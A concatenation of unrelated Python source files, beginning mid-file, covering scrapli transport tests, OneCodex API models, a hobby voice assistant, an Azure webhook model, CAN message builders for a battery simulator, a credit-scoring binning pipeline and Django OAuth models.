"-F",
"/dev/null",
"additional_cmd",
]
def test_close(fs, monkeypatch, system_transport):
def _close(cls):
pass
monkeypatch.setattr(
"scrapli.transport.plugins.system.ptyprocess.PtyProcess.close",
_close,
)
# giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
# if its really necessary, but it *does* need a fd of some sort so whatever
fs.create_file("dummy")
dummy_file = open("dummy")
system_transport.session = PtyProcess(pid=0, fd=dummy_file.fileno())
system_transport.close()
assert system_transport.session is None
def test_isalive_no_session(system_transport):
assert system_transport.isalive() is False
def test_isalive(fs, system_transport):
# lie and pretend the session is already assigned
# giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
# if its really necessary, but it *does* need a fd of some sort so whatever; also give it a
# forked pid so that the isalive method works... obviously this is sorta cheating to force it
# to work but we really only care that scrapli does the right thing... we have faith that
# ptyprocess will be doing the right thing "below" scrapli
dummy_pid, fd = pty.fork()
fs.create_file("dummy")
dummy_file = open("dummy")
system_transport.session = PtyProcess(pid=dummy_pid, fd=dummy_file.fileno())
assert system_transport.isalive() is True
def test_read(fs, monkeypatch, system_transport):
def _read(cls, _):
return b"somebytes"
monkeypatch.setattr(
"scrapli.transport.plugins.system.ptyprocess.PtyProcess.read",
_read,
)
# lie and pretend the session is already assigned
# giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
# if its really necessary, but it *does* need a fd of some sort so whatever
dummy_pid, fd = pty.fork()
fs.create_file("dummy")
dummy_file = open("dummy")
system_transport.session = PtyProcess(pid=dummy_pid, fd=dummy_file.fileno())
assert system_transport.read() == b"somebytes"
def test_read_exception_not_open(system_transport):
with pytest.raises(ScrapliConnectionNotOpened):
system_transport.read()
def test_read_exception_eof(fs, monkeypatch, system_transport):
def _read(cls, _):
raise EOFError
monkeypatch.setattr(
"scrapli.transport.plugins.system.ptyprocess.PtyProcess.read",
_read,
)
# lie and pretend the session is already assigned
# giving ptyprocess a "real" (but not like... real real) fd seemed like a good idea... dunno
# if its really necessary, but it *does* need a fd of some sort so whatever
fs.create_file("dummy")
dummy_file = open("dummy")
system_transport.session = PtyProcess(pid=0, fd=dummy_file.fileno())
with pytest.raises(ScrapliConnectionError):
system_transport.read()
def test_write(system_transport):
system_transport.session = BytesIO()
system_transport.write(b"blah")
system_transport.session.seek(0)
assert system_transport.session.read() == b"blah"
def test_write_exception(system_transport):
with pytest.raises(ScrapliConnectionNotOpened):
system_transport.write("blah")
|
from onecodex.models import OneCodexBase, ResourceList
from onecodex.models.helpers import ResourceDownloadMixin
from onecodex.models.analysis import Analyses
class AnnotationSets(OneCodexBase, ResourceDownloadMixin):
_resource_path = "/api/v1_experimental/annotation_sets"
def download(self, path=None, file_obj=None, progressbar=False):
"""Download an AnnotationSet in GenBank format.
Parameters
----------
path : `string`, optional
Full path to save the file to. If omitted, defaults to the original filename
in the current working directory.
file_obj : file-like object, optional
Rather than save the file to a path, write it to this file-like object.
progressbar : `bool`
Display a progress bar using Click for the download?
Returns
-------
`string`
The path the file was downloaded to, if applicable. Otherwise, None.
Notes
-----
If no arguments specified, defaults to download the file as the original filename
in the current working directory. If `file_obj` given, will write data into the
passed file-like object. If `path` given, will download the file to the path provided,
but will not overwrite any existing files.
"""
return self._download(
"download_uri",
"annotation_set_" + self.id + ".gbk.gz",
use_potion_session=False,
path=path,
file_obj=file_obj,
progressbar=progressbar,
)
def download_csv(self, path=None, file_obj=None, progressbar=False):
"""Download an AnnotationSet in CSV format.
Includes Annotation coordinates and sequences in both amino acid and nucleotide space.
Parameters
----------
path : `string`, optional
Full path to save the file to. If omitted, defaults to the original filename
in the current working directory.
file_obj : file-like object, optional
Rather than save the file to a path, write it to this file-like object.
progressbar : `bool`
Display a progress bar using Click for the download?
Returns
-------
`string`
The path the file was downloaded to, if applicable. Otherwise, None.
Notes
-----
If no arguments specified, defaults to download the file as the original filename
in the current working directory. If `file_obj` given, will write data into the
passed file-like object. If `path` given, will download the file to the path provided,
but will not overwrite any existing files.
"""
return self._download(
"download_csv",
"annotation_set_" + self.id + ".csv",
use_potion_session=True,
path=path,
file_obj=file_obj,
progressbar=progressbar,
)
class Assemblies(OneCodexBase, ResourceDownloadMixin):
_resource_path = "/api/v1_experimental/assemblies"
def download(self, path=None, file_obj=None, progressbar=False):
"""Download an Assembly in FASTA format.
Parameters
----------
path : `string`, optional
Full path to save the file to. If omitted, the file will be saved in the current working
directory. The filename will include the taxon name (if available), followed by the
genome name (if available), followed by the genome UUID. If this assembly is not
associated with a genome, the filename will be ``assembly_<UUID>.fasta``.
file_obj : file-like object, optional
Rather than save the file to a path, write it to this file-like object.
progressbar : `bool`
Display a progress bar using Click for the download?
Returns
-------
`string`
The path the file was downloaded to, if applicable. Otherwise, None.
Notes
-----
Existing paths will not be overwritten.
"""
return self._download(
"download_uri",
# Set `_filename` to `None` to use the filename provided by the server.
_filename=None,
use_potion_session=False,
path=path,
file_obj=file_obj,
progressbar=progressbar,
)
class Genomes(OneCodexBase):
_resource_path = "/api/v1_experimental/genomes"
def __repr__(self):
return "<Genome {} {} ({})>".format(self.id, self.taxon.name, self.name)
class Taxa(OneCodexBase):
_resource_path = "/api/v1_experimental/taxa"
def __repr__(self):
return "<Taxa {} {} ({})>".format(self.taxon_id, self.name, self.rank)
def genomes(self):
"""Return a list of all Genomes belonging to descendants of this Taxon."""
return ResourceList(self._resource.genomes(), Genomes)
def parents(self):
"""Return a list of all parents of this Taxon, at all ranks."""
return ResourceList(self._resource.parents(), Taxa)
class FunctionalProfiles(Analyses):
_resource_path = "/api/v1_experimental/functional_profiles"
def results(self, json=True):
"""Return the complete results table for a functional analysis.
Parameters
----------
json : `bool`, optional
Return result as JSON? Default True.
Returns
-------
table : `dict` or `pd.DataFrame`
Return a JSON object with the functional analysis results or a `pd.DataFrame` if json=False.
"""
if json is True:
return self._results()
else:
return self.table()
def table(self):
"""Return the complete results table for the functional analysis.
Returns
-------
table : `pd.DataFrame`
A Pandas DataFrame of the functional results.
"""
import pandas as pd
return pd.DataFrame(self._results()["table"])
|
import datetime
import os
import webbrowser
import pyttsx3
import pywhatkit
import speech_recognition as sr
import wikipedia
import pyjokes
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
hour = int(datetime.datetime.now().hour)
if (hour > 0 and hour < 12):
speak("Good Morning!")
elif (hour >= 12 and hour < 18):
speak("Good Afternoon!")
else:
speak("Good Evening")
speak("I am Kamalexa here . Please tell me How may I help You")
def takeCommand():
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
audio = r.listen(source)
try:
print("Recognizing...")
query = r.recognize_google(audio, language='en-in')
print(f"User said: {query}\n")
except Exception as e:
print("Say that again please...")
return "None"
return query
if __name__ == "__main__":
wishMe()
while True:
try:
query = takeCommand().lower()
if 'wikipedia' in query:
speak("Searching Wikipedia...")
query = query.replace("wikipedia", "")
results = wikipedia.summary(query, sentences=1)
print(results)
speak("According to wikipedia")
speak(results)
## elif 'experiment' in query: ## THIS IS DOING THE SAME THING AS THE ABOVE WIKIPEDIA IS DOING
## query = query.replace('experiment' , '')
## pywhatkit.info(query , lines = 2)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'play' in query:
query = query.replace('play', '')
pywhatkit.playonyt(query)
print("Playing...")
speak("Playing...")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open whatsapp' in query:
webbrowser.open("https://web.whatsapp.com/")
elif 'play music' in query:
music_dir = 'D:\\Songs'
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir, songs[0]))
elif 'the time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"Sir, The time is {strTime}\n")
elif 'open code' in query:
codePath = "C:\\Users\\Kamalpreet Singh\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'open linkedin' in query:
webbrowser.open("https://www.linkedin.com/in/kamalpreet-singh-8558131a0/")
speak("Opening your linked account")
elif 'open facebook' in query:
webbrowser.open("https://www.facebook.com/profile.php?id=100014358135907")
speak("Opening Facebook")
elif 'open twitter' in query:
webbrowser.open("https://www.twitter.com")
speak("Opening Twitter")
elif 'open instagram' in query:
webbrowser.open("https://www.instagram.com/kamalpreet__singh__/")
speak("Opening Instagram")
elif 'how are you' in query:
speak("Sir I am Great")
elif 'your name' in query:
speak("Sir my name is Kamalexa")
elif 'search' in query:
query = query.replace("search", "")
webbrowser.open(f"https://www.google.com/search?q=${query}")
elif 'tell me something funny' in query:
joke = speak(pyjokes.get_joke())
print(joke)
except Exception as e:
print(e)
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class WebhookCreateOrUpdateParameters(Model):
"""The parameters supplied to the create or update webhook operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Gets or sets the name of the webhook.
:type name: str
:param is_enabled: Gets or sets the value of the enabled flag of webhook.
:type is_enabled: bool
:param uri: Gets or sets the uri.
:type uri: str
:param expiry_time: Gets or sets the expiry time.
:type expiry_time: datetime
:param parameters: Gets or sets the parameters of the job.
:type parameters: dict[str, str]
:param runbook: Gets or sets the runbook.
:type runbook: ~azure.mgmt.automation.models.RunbookAssociationProperty
:param run_on: Gets or sets the name of the hybrid worker group the
webhook job will run on.
:type run_on: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'is_enabled': {'key': 'properties.isEnabled', 'type': 'bool'},
'uri': {'key': 'properties.uri', 'type': 'str'},
'expiry_time': {'key': 'properties.expiryTime', 'type': 'iso-8601'},
'parameters': {'key': 'properties.parameters', 'type': '{str}'},
'runbook': {'key': 'properties.runbook', 'type': 'RunbookAssociationProperty'},
'run_on': {'key': 'properties.runOn', 'type': 'str'},
}
def __init__(self, *, name: str, is_enabled: bool=None, uri: str=None, expiry_time=None, parameters=None, runbook=None, run_on: str=None, **kwargs) -> None:
super(WebhookCreateOrUpdateParameters, self).__init__(**kwargs)
self.name = name
self.is_enabled = is_enabled
self.uri = uri
self.expiry_time = expiry_time
self.parameters = parameters
self.runbook = runbook
self.run_on = run_on
|
## TO TELL ME THE AGE ##
def tell_my_age(age):
print('My age is {}'.format(age))
|
# -*- coding: utf-8 -*-
from setuptools import setup
from setuptools import Extension
import os
packages = \
['app', 'app.cython_ext', 'app.data']
package_data = \
{'': ['*']}
extras_require = \
{'Nuitka': ['Nuitka>=0.6.19.4,<0.7.0.0'],
'cython': ['cython>=0.29.15,<0.30.0'],
'pyinstaller': ['pyinstaller>=4.8,<5.0'],
'pyoxidizer': ['pyoxidizer>=0.18.0,<0.19.0']}
entry_points = \
{'console_scripts': ['monopoly = app:main',
'scriptopoly = install_monopoly:main']}
setup_kwargs = {
'name': 'monopoly-probabilities',
'version': '0.1.0',
'description': 'Calculate the probabilties of landing on each different square on a monopoly board.',
'long_description': None,
'author': 'George Waters',
'author_email': 'george@georgeh2os.com',
'maintainer': None,
'maintainer_email': None,
'url': None,
'packages': packages,
'package_data': package_data,
'extras_require': extras_require,
'entry_points': entry_points,
'python_requires': '>=3.7,<3.11',
}
if os.getenv("BUILD_EXTENSION"):
setup_kwargs.update(
ext_modules = [Extension("app.cython_ext.monopoly", ["app/cython_ext/monopoly.cpp"])]
)
setup(**setup_kwargs)
|
import sys
def dfs(v):
global ans
stack = [v]
tr.append(v)
w = graph[v]
visit[v] = True
if visit[w]:
a = 0
try:
a = tr.index(w)
except:
a = -1
if a != -1:
ans += tr[a:]
else:
dfs(w)
sys.setrecursionlimit(10**6)
t= int(sys.stdin.readline().rstrip("\n"))
for _ in range(t):
n = int(sys.stdin.readline().rstrip("\n"))
ans = []
graph = [0]*(n+1)
arr = list(map(int,sys.stdin.readline().rstrip("\n").split(" ")))
for k,c in enumerate(arr):
graph[k+1] =c
visit = [False for _ in range(n+1)]
for i in range(1,n+1):
if not visit[i]:
tr = []
dfs(i)
print(n-len(ans))
|
#import subprocess
import yaml
import pandas as p
import json as js
import os, sys
#cmd = "ls pageyml"
#res = os.system(cmd)
#res = subprocess.check_output(cmd.split(' ')).strip()
#print (res)
#sys.exit()
def mkspc(x, maxsp, sep=' '):
return(''.join([sep]*(maxsp-len(x))))
def openfile(fname):
fp = open(fname, 'r')
res = fp.read()
fp.close()
return(res)
def view(fname, ftype='json'):
res = openfile(fname)
#if ftype == 'json':
# res = js.loads(res)
if ftype == 'yaml':
res = yaml.safe_load(res)
def mkhdr(res, nsep=60, verbose=True):
keys = ''
try:
keys = sorted(res.keys())
#print('\n--------------------------------------------------------------------------------\n')
#print(keys)
li = [x.split('-') for x in keys]
#print(li)
dfli = p.DataFrame(li)
dfli['name'] = keys
def literalSortMap(dfli, column=0, literals=''):
vs = literals.split(' ')
ks = list(range(0, len(vs)))
#ks = [int(x) for x in '0 1 2 3 4 5 6 7 8 9 10'.split(' ')]
smap = dict(zip(ks, vs))
rsmap = dict(zip(vs, ks))
#print(smap)
#print(rsmap)
#dfli[0] = [rsmap[x] for x in dfli[0]]
for x in dfli.index:
try: dfli.loc[x,column] = rsmap[dfli.loc[x,column]]
except Exception as e: '' #print(e)
return(dfli)
dfli = literalSortMap(dfli, column=0, literals='desktop tablet mobile')
dfli = literalSortMap(dfli, column=0, literals='id name variant type master data template stylesheets context')
dfli = literalSortMap(dfli, column=0, literals='header first second third fourth fifth sixth seventh eighth ninth footer')
dfli = literalSortMap(dfli, column=1, literals='logo menu cart')
dfli = literalSortMap(dfli, column=1, literals='column1 column2 column3 column4 column5')
byl = [0,1] # list(range(0, 1))
try: dfli = dfli.sort_values(by=byl)
except Exception as e: '' #print(e)
try:
#print(' lenkeys: %s'%len(keys))
keys = list(dfli['name'])
#print('lenkeys[sorted]: %s'%len(keys))
except Exception as e: print(e)
li = []
for i in keys:
li.append(type(res[i]))
#print('%s: %s %s' % (i, mkspc(i, nsep), type(res[i])))
dfli['type'] = li
dfli = dfli.loc[:, 'name type'.split(' ')].set_index('name')
with p.option_context('display.max_rows', 4000, 'display.max_columns', 4000, 'display.width', 1000000):
if verbose:
print(dfli)
print('')
#print('\n++++++++++++++++++++++++++++++++++++++++\n')
print('\n%s\n' % mkspc('', 40, sep='+'))
except AttributeError as e:
#print(e)
try:
for i in range(len(res)): print('%s: %s %s' % (i, mkspc(i, 20), type(res[i])))
except:
''
return keys
def mkall(o, title='Global', nsep=150, transpose=False, header=True):
#print('\n--------------------------------------------------------------------------------\n')
print('\n---- %s %s %s\n' % (title, str(type(o)), mkspc('', (nsep-len(title)), sep='-')))
#print(': %s %s' % (mkspc(o, 20), ))
keys = mkhdr(o, verbose=header)
try: df = p.DataFrame(o)
except ValueError as e: df = p.DataFrame(o, index=[0])
df = df.fillna('')
try: df = df.loc[:, keys]
except: ''
if transpose: df = df.transpose()
with p.option_context('display.max_rows', 4000, 'display.max_columns', 4000, 'display.width', 1000000):
print(df)
mkall(res)
mkall(res['template'], 'template')
o = res['template']['children']
mkall(o, 'template children')
for oi in range(len(o)):
o2 = o[oi]['children']
mkall(o2, 'template children %s children' % oi)
for oi2 in range(len(o2)):
try:
o3 = o2[oi2]['data']
except KeyError as e:
print(e)
#continue
pass
mkall(o3, 'template children %s children %s data' % (oi, oi2))
for oi3 in range(len(o3)):
try:
mkall(o3[oi3]['src'], 'template children %s children %s data %s src' % (oi, oi2, oi3))
except KeyError as e:
#print(e)
''
for oi3 in range(len(o3)):
try:
mkall(o3[oi3]['routes'], 'template children %s children %s data %s routes' % (oi, oi2, oi3))
except KeyError as e:
#print(e)
''
#print('\n================================================================================================================================================================\n')
print('\n%s\n' % mkspc('', 160, sep='='))
transpose = True
pheader = False
#mkall(res['stylesheets'], 'stylesheets', nsep=150)
mkall(res['stylesheets']['mobile'], 'stylesheets mobile', transpose=transpose, header=pheader)
mkall(res['stylesheets']['tablet'], 'stylesheets tablet', transpose=transpose, header=pheader)
mkall(res['stylesheets']['desktop'], 'stylesheets desktop', transpose=transpose, header=pheader)
if __name__ == "__main__":
import argparse
## source: https://docs.python.org/2/howto/argparse.html
parser = argparse.ArgumentParser()
parser.add_argument("-v", '--view', help="viewjson", action="store_true")
parser.add_argument("-sh", '--syntaxHighlight', help="syntax highlight", action="store_true")
parser.add_argument("-f", '--file', help="filter index by")
parser.add_argument("-t", '--type', help="json | yaml")
args = parser.parse_args()
if args.view:
view(args.file, args.type)
if args.syntaxHighlight:
# https://stackoverflow.com/questions/9105031/how-to-beautify-json-in-python
import sys
import json
from pygments import highlight, lexers, formatters
res = openfile(args.file)
formatted_json = json.dumps(json.loads(res))#, indent=4))
colorful_json = highlight(unicode(formatted_json, 'UTF-8'), lexers.JsonLexer(), formatters.TerminalFormatter())
print(colorful_json)
|
from struct import pack, unpack
from can import Message
def cell_V_set_1_4(box_id: int, cell_1_4_v: list[float]) -> Message:
"""
Sets the Voltage Setpoints for Cells 1-4, range 0 to 5 V
"""
try:
arb_id = 160 + box_id
v_data = pack("<4e", *cell_1_4_v)
frame = Message(arbitration_id= arb_id,
data= v_data,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating Cell_Set_V_1_4 message:", e)
def cell_V_set_5_8(box_id: int, cell_5_8_v: list[float]) -> Message:
"""
Sets the Voltage Setpoints for Cells 1-4, range 0 to 5 V
"""
try:
arb_id = 176 + box_id
v_data = pack("<4e", *cell_5_8_v)
frame = Message(arbitration_id= arb_id,
data= v_data,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating Cell_Set_V_5_8 message:", e)
def cell_V_set_9_12(box_id: int, cell_9_12_v: list[float]) -> Message:
"""
Sets the Voltage Setpoints for Cells 1-4, range 0 to 5 V
"""
try:
arb_id = 192 + box_id
v_data = pack("<4e", *cell_9_12_v)
frame = Message(arbitration_id= arb_id,
data= v_data,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating Cell_Set_V_9_12 message:", e)
def hil_mode_trig(box_id: int, enable: bool) -> Message:
"""
HIL mode start/stop trigger
Returns a pcan.Message sent to the BS1200
to enable/disable HIL mode
Parameters:
--Box ID of the BS1200 unit
--Enable/disable (True/False) trigger for data payload
"""
try:
arb_id = 128 + box_id
frame = Message(arbitration_id = arb_id,
data = bytes([enable]),
is_extended_id = False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating HIL mode trigger frame:", e)
return None
def dio_set_1_8(box_id: int, dio_val: list[bool], dio_direction: list[bool]) -> Message:
"""
Returns message to configure the output
value and direction for the Digital IO
"""
try:
arb_id = 512 + box_id
dir_int = sum(2**i for i, v in enumerate(dio_direction) if v)
en_int = sum(2**i for i, v in enumerate(dio_val) if v)
dio_payload = bytearray([en_int, dir_int])
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
data = dio_payload,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating DIO Setpoints message:", e)
return None
def ao_set_1_2(box_id: int, ao1_voltage: float, ao2_voltage: float) -> Message:
"""
Generate message sent to configure
the BS1200 analog output setpoints
Voltage setpoints are valid in the range 0-5 Volts
"""
try:
arb_id = 544 + box_id
ao1 = pack("<e", ao1_voltage)
ao2 = pack("<e", ao2_voltage)
ao_payload = ao1 + ao2 + bytes(4) #pad payload with 4 empty bytes (as seen in CAN DB)
frame = Message(arbitration_id = arb_id,
is_extended_id = False,
data = ao_payload,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating analog output setpoint message:", e)
return None
def config(box_id: int, dio_hil_set_en: bool, ao_hil_set_en: bool, dio_hil_bcast_en: bool,
ai_1_4_bcast_en: bool, ai_5_8_bcast_en: bool, cal_mode: bool) -> Message:
"""
Generate a message to configure the Box Mode and Message Configuration
"""
try:
arb_id = 1024 + box_id
bool_array =[dio_hil_set_en, ao_hil_set_en, False, False, False, False, False, False, #Bits 0-7
dio_hil_bcast_en, ai_1_4_bcast_en, ai_5_8_bcast_en, False, False, False, False, False, #Bits 8-15
cal_mode, False, False, False, False, False, False, False] #Bits 16-23
byte1 = sum(2**i for i, v in enumerate(bool_array[0:7]) if v)
byte2 = sum(2**i for i, v in enumerate(bool_array[8:15]) if v)
byte3 = sum(2**i for i, v in enumerate(bool_array[16:23]) if v)
frame = Message(arbitration_id = arb_id,
is_extended_id = False,
data = bytes([byte1, byte2, byte3]),
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error generating message for box mode and message configuration:", e)
return None
def cell_current_set_all(box_id, I_sink_all: int, I_source_all: int) -> Message:
"""
Generates a message to set the source and sinking current for all cells
"""
try:
arb_id = 1125 + box_id
curr_vals = I_sink_all.to_bytes(2, 'little')+I_source_all.to_bytes(2, 'little')
frame = Message(arbitration_id= arb_id,
is_extended_id = False,
data = curr_vals,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing cell current set all message:", e)
return None
def cell_current_sink_setpoint(box_id, channel: int, I_sink: float) -> Message:
"""
Generates a message to set the sink current of a single channel
"""
try:
arb_id = 1184 + box_id
sink_val = I_sink.to_bytes(2, 'little')
frame = Message(arbitration_id= arb_id,
is_extended_id = False,
data = bytes([channel-1])+sink_val,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing set cell sinking current message:", e)
return None
def cell_current_source_setpoint(box_id, channel: int, I_source: float) -> Message:
"""
Generates a message to set the source current for a signle channel
"""
try:
arb_id = 1200 + box_id
source_val = I_source.to_bytes(2, 'little')
frame = Message(arbitration_id= arb_id,
is_extended_id = False,
data = bytes([channel-1])+source_val,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing message to set cell %d to %f: %s" % channel, I_source, e)
return None
def cell_voltage_set_all(box_id, v_all: float) -> Message:
"""
Generates a message to set the voltage value for all cells
"""
try:
arb_id = 1280 + box_id
volt_val = pack("<e", v_all)
frame = Message(arbitration_id= arb_id,
is_extended_id = False,
data = volt_val,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing cell current set all message:", e)
return None
def cell_voltage_setpoint(box_id, channel: int, volt_val: float) -> Message:
"""
Generates a message to set the source current for a signle channel
"""
try:
arb_id = 1296 + box_id
source_val = pack("<e", volt_val)
frame = Message(arbitration_id= arb_id,
is_extended_id = False,
data = bytes([channel-1])+source_val,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing message to set cell %d to %f volts: %s" % channel, volt_val, e)
return None
def cell_enable_all(box_id: int, enable: bool) -> Message:
"""
Generate message to enable or disable all cells
"""
try:
arb_id = 1344 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
data = bytes([enable]),
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing cell enable all message:", e)
return None
def cell_enable(box_id: int, channel: int, enable: bool) -> Message:
"""
Generate message to enable or disable cell
"""
try:
arb_id = 1360 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
data = bytes([channel-1])+bytes([enable]),
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing cell enable message for channel %d: %s" % channel, e)
return None
def status(box_id: int) -> Message:
"""
Generates empty bs1200 status frame
"""
try:
arb_id = 256 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing bs1200 status frame: ", e)
return None
def cell_V_get_1_4(box_id: int) -> Message:
"""
Generate frame to capture cell voltage readback for cells 1-4
"""
try:
arb_id = 288 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing Cell_V_Readback_1_4 frame", e)
def cell_V_get_5_8(box_id: int) -> Message:
"""
Generate frame to capture cell voltage readback for cells 5-8
"""
try:
arb_id = 304 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing Cell_V_Readback_5_8 frame", e)
def cell_V_get_9_12(box_id: int) -> Message:
"""
Generate frame to capture cell voltage readback for cells 9-12
"""
try:
arb_id = 320 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing Cell_V_Readback_9_12 frame", e)
def cell_I_get_1_4(box_id: int) -> Message:
"""
Generate frame to capture cell current readback for cells 1-4
"""
try:
arb_id = 384 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing Cell_I_Readback_1_4 frame", e)
def cell_I_get_5_8(box_id: int) -> Message:
"""
Generate frame to capture cell current readback for cells 5-8
"""
try:
arb_id = 400 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing Cell_I_Readback_5_8 frame", e)
def cell_I_get_9_12(box_id: int) -> Message:
"""
Generate frame to capture cell current readback for cells 9-12
"""
try:
arb_id = 416 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing Cell_I_Readback_9_12 frame", e)
def dio_states_1_8(box_id: int) -> Message:
"""
Generate frame to readback DIO States for channels 1 to 8
"""
try:
arb_id = 640 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing DIO_Readback_1_8 frame", e)
def ai_get_1_4(box_id: int) -> Message:
"""
Generate frame to readback analog input channels 1 to 4
"""
try:
arb_id = 672 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing AI_Readback_1_4 frame", e)
def ai_get_5_8(box_id: int) -> Message:
"""
Generate frame to readback analog input channels 5 to
"""
try:
arb_id = 688 + box_id
frame = Message(arbitration_id = arb_id,
is_extended_id= False,
check = True,
is_fd= False
)
return frame
except ValueError as e:
print("Error constructing AI_Readback_5_8 frame", e)
|
import pandas as pd
import numpy as np
from optbinning import BinningProcess
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import classification_report
from sklearn.metrics import auc, roc_auc_score, roc_curve
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
raw_data = pd.read_csv('data/raw/heloc_dataset_v1.csv', delimiter=',')
variable_names = list(raw_data.columns[1:])
X_train = np.genfromtxt('data/preprocessed/X_train.csv', delimiter=',')
X_test = np.genfromtxt('data/preprocessed/X_test.csv', delimiter=',')
y_train = np.genfromtxt('data/preprocessed/y_train.csv', delimiter=',')
y_test = np.genfromtxt('data/preprocessed/y_test.csv', delimiter=',')
special_codes = [-9, -8, -7]
binning_fit_params = {
"ExternalRiskEstimate": {"monotonic_trend": "descending"},
"MSinceOldestTradeOpen": {"monotonic_trend": "descending"},
"MSinceMostRecentTradeOpen": {"monotonic_trend": "descending"},
"AverageMInFile": {"monotonic_trend": "descending"},
"NumSatisfactoryTrades": {"monotonic_trend": "descending"},
"NumTrades60Ever2DerogPubRec": {"monotonic_trend": "ascending"},
"NumTrades90Ever2DerogPubRec": {"monotonic_trend": "ascending"},
"PercentTradesNeverDelq": {"monotonic_trend": "descending"},
"MSinceMostRecentDelq": {"monotonic_trend": "descending"},
"NumTradesOpeninLast12M": {"monotonic_trend": "ascending"},
"MSinceMostRecentInqexcl7days": {"monotonic_trend": "descending"},
"NumInqLast6M": {"monotonic_trend": "ascending"},
"NumInqLast6Mexcl7days": {"monotonic_trend": "ascending"},
"NetFractionRevolvingBurden": {"monotonic_trend": "ascending"},
"NetFractionInstallBurden": {"monotonic_trend": "ascending"},
"NumBank2NatlTradesWHighUtilization": {"monotonic_trend": "ascending"}
}
binning_process = BinningProcess(variable_names, special_codes=special_codes,
binning_fit_params=binning_fit_params)
clf_lr = Pipeline(steps=[('binning_process', binning_process),
('classifier', LogisticRegression(solver='lbfgs'))])
clf_lr.fit(X_train, y_train)
y_pred = clf_lr.predict(X_test)
print(classification_report(y_test, y_pred))
|
from django.db import models
# Create your models here.
from django.utils.timezone import now
from Blog import settings
from account.models import BlogUser
class OauthUser(models.Model):
user_alternative_type = (
("1","github"),
("2","google"),
)
user = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE,
null=True,blank=True)
openid = models.CharField(default="",max_length=100,unique=True)
user_type = models.CharField(max_length=20,choices=user_alternative_type)
nickname = models.CharField(max_length=150,verbose_name="昵称")
tocken = models.CharField(max_length=255,blank=True,null=True)
picture = models.CharField(max_length=150,blank=True,null=True)
email = models.EmailField(max_length=50,default="")
create_time = models.DateTimeField(verbose_name="创建时间",default=now)
last_mod_time = models.DateTimeField(verbose_name="修改时间",default=now)
def __str__(self):
return self.nickname
class Meta:
verbose_name = "oauth用户"
verbose_name_plural = verbose_name
ordering = ["-create_time"]
class OauthConfig(models.Model):
user_alternative_type = (
("github","github"),
("google","google"),
)
type = models.CharField(max_length=150,choices=user_alternative_type,
default="github")
app_key = models.CharField(max_length=200,verbose_name="AppKey")
app_secret = models.CharField(max_length=200,verbose_name="AppSecret")
callBack_url = models.URLField(max_length=255,verbose_name="回调地址",
default="http://127.0.0.1:8000/")
create_time = models.DateTimeField(verbose_name="创建时间", default=now)
last_mod_time = models.DateTimeField(verbose_name="修改时间", default=now)
is_enable = models.BooleanField(verbose_name="是否显示",default=True)
class Meta:
verbose_name = "oauth配置"
verbose_name_plural = verbose_name
ordering = ["-create_time"] |
#
